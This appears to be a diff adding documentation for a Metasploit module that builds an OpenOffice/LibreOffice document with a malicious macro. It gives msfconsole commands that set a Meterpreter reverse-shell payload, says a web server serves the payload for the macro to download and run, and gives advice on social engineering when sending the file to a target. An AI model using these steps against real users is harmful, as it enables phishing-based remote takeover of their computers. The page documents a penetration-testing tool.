|
| 1 | +## Description |
| 2 | + |
| 3 | +This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also |
| 4 | +works against LibreOffice. |
| 5 | + |
| 6 | +For exploit successfully, the targeted user must adjust the security level in Macro Security to |
| 7 | +either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the |
| 8 | +macro. If set to Low, the macro can automatically run without any warning. |
| 9 | + |
| 10 | +## Vulnerable Application |
| 11 | + |
| 12 | +* Apache OpenOffice |
| 13 | +* LibreOffice |
| 14 | + |
| 15 | +## Verification Steps |
| 16 | + |
| 17 | +To use this exploit, you must know the platform of the targeted user. The module supports either |
| 18 | +Windows, Linux, and OSX. If the target is using Windows, then the exploit will generate the macro |
| 19 | +with malicious Powershell code inside. For other supported platforms, the exploit will generate |
| 20 | +Python code. |
| 21 | + |
| 22 | +An example of using this module against Windows: |
| 23 | + |
| 24 | +1. Start msfconsole |
| 25 | +2. ```use exploit/multi/misc/openoffice_document_macro``` |
| 26 | +3. ```set target 0``` |
| 27 | +4. ```set payload windows/meterpreter/reverse_tcp``` |
| 28 | +5. ```exploit``` |
| 29 | + |
| 30 | +An example of using this module against Linux or OSX: |
| 31 | + |
| 32 | +1. Start msfconsole |
| 33 | +2. ```use exploit/multi/misc/openoffice_document_macro``` |
| 34 | +3. ```set target 1``` |
| 35 | +4. ```set payload python/meterpreter/reverse_tcp``` |
| 36 | +5. ```exploit``` |
| 37 | + |
| 38 | +Once started, the module will mainly do these things: |
| 39 | + |
| 40 | +1. It will start a payload handler. |
| 41 | +2. It will start a web server. This is used for the macro to download and execute our final payload. |
| 42 | +3. The malicious odt file. Send this to your targeted user. |
| 43 | + |
| 44 | +## Options |
| 45 | + |
| 46 | +**BODY** |
| 47 | + |
| 48 | +This option can be used to insert text to the malicious document. |
| 49 | + |
| 50 | +## Modification |
| 51 | + |
| 52 | +Since social engineering will play a big part in the success of the attack, you will most likely |
| 53 | +want to modify the odt file. |
| 54 | + |
| 55 | +1. To do so, first use msfconsole to generate the malicious odt file. |
| 56 | +2. Move the odt file to a system that has OpenOffice or LibreOffice |
| 57 | +3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro |
| 58 | + code unless you actually know what you're doing. |
| 59 | + |
0 commit comments